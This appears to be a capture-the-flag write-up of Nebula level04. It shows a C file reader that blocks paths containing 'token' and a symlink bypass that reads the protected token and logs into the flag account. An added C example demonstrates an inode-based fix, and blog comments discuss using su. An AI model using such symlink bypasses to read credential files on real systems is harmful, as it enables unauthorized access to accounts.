This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
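    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/types.h>
    #include <stdio.h>
    #include <fcntl.h>
    #include <err.h>

    int main(int argc, char **argv, char **envp)
    {
        char buf[1024];
        int fd, rc;

        if(argc == 1) {
            printf("%s [file to read]\n", argv[0]);
            exit(EXIT_FAILURE);
        }

        /* The only restriction: the supplied path must not contain "token". */
        if(strstr(argv[1], "token") != NULL) {
            printf("You may not access '%s'\n", argv[1]);
            exit(EXIT_FAILURE);
        }

        /* open() follows symbolic links, so the name checked above need not
           be the name of the file that is actually opened. */
        fd = open(argv[1], O_RDONLY);
        if(fd == -1) {
            err(EXIT_FAILURE, "Unable to open %s", argv[1]);
        }

        rc = read(fd, buf, sizeof(buf));
        if(rc == -1) {
            err(EXIT_FAILURE, "Unable to read fd %d", fd);
        }

        write(1, buf, rc);
    }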
This program looks like it will read the file passed to it by the first argument. Let’s test that out:
level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ ./flag04 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
Everything as expected then. The problem is that it explicitly refuses to open any path that contains the string "token". How can we get round this?
Symbolic links to the rescue again!
level04@nebula:~$ ln -s /home/flag04/token Token
level04@nebula:~$ /home/flag04/flag04 /home/level04/Token
06508b5e-8909-4f38-b630-fdb148a848a2
Just create a symbolic link to a name that doesn’t match “token”.
So what is this long string? It seems sensible to try logging in to the flag04 account with it:
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
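Why the check fails, and one way to close it, as an added example that is not part of the original post or of the Nebula source: the name filter is compared with a check on the identity (device and inode) of the file that was actually opened. The function names, the scratch directory and the file names "alias" and "notes" are assumptions made for the demonstration.

```c
#define _XOPEN_SOURCE 700   /* for mkdtemp() and symlink() */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The page's check: blocks only when the supplied name contains "token". */
static int name_check_blocks(const char *path)
{
    return strstr(path, "token") != NULL;
}

/* Hypothetical replacement: open first, then compare the opened object with
 * the protected file. Returns 1 = blocked, 0 = allowed, -1 = error. */
static int identity_check_blocks(const char *path, const char *protected_path)
{
    struct stat want, got;
    int fd, rc;
    if (stat(protected_path, &want) == -1 || (fd = open(path, O_RDONLY)) == -1)
        return -1;
    rc = fstat(fd, &got);   /* a real reader would keep fd and read from it */
    close(fd);
    return rc == -1 ? -1 : (got.st_dev == want.st_dev && got.st_ino == want.st_ino);
}

/* Constructed fixture: "token", unrelated "notes", symlink "alias" -> "token". */
static int make_fixture(void)
{
    char dir[] = "/tmp/level04-demo-XXXXXX";
    const char *names[] = { "token", "notes" };
    if (mkdtemp(dir) == NULL || chdir(dir) == -1)
        return -1;
    for (int i = 0; i < 2; i++) {
        int fd = open(names[i], O_WRONLY | O_CREAT | O_EXCL, 0600);
        if (fd == -1 || write(fd, "constructed\n", 12) != 12)
            return -1;
        close(fd);
    }
    return symlink("token", "alias");
}

int main(void)
{
    if (make_fixture() == -1) { perror("fixture"); return 1; }
    printf("alias: name check blocks=%d, identity check blocks=%d\n",
           name_check_blocks("alias"), identity_check_blocks("alias", "token"));
    return 0;
}
```

The name check lets "alias" through while the identity check blocks it, because the comparison is made on the file the descriptor refers to rather than on the string the caller supplied.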
emily
June 25, 2017 at 4:24am
but how?
In order to logon to another user I have to logout.
Then when I go to login with user flag04 I’m asked for a password and since I don’t know the password, I can’t execute ‘getflag’. Can’t copy the string to use it as a password bc I can’t select and copy shit from my terminal. grrrrrrrrrrrr
Fucking irritating
Hideki
December 4, 2017 at 1:33am
you should try learning some linux first..
you can use “su flag04” for example.
Bon
November 19, 2017 at 7:11pm
Don’t logout, use :
$ su flag04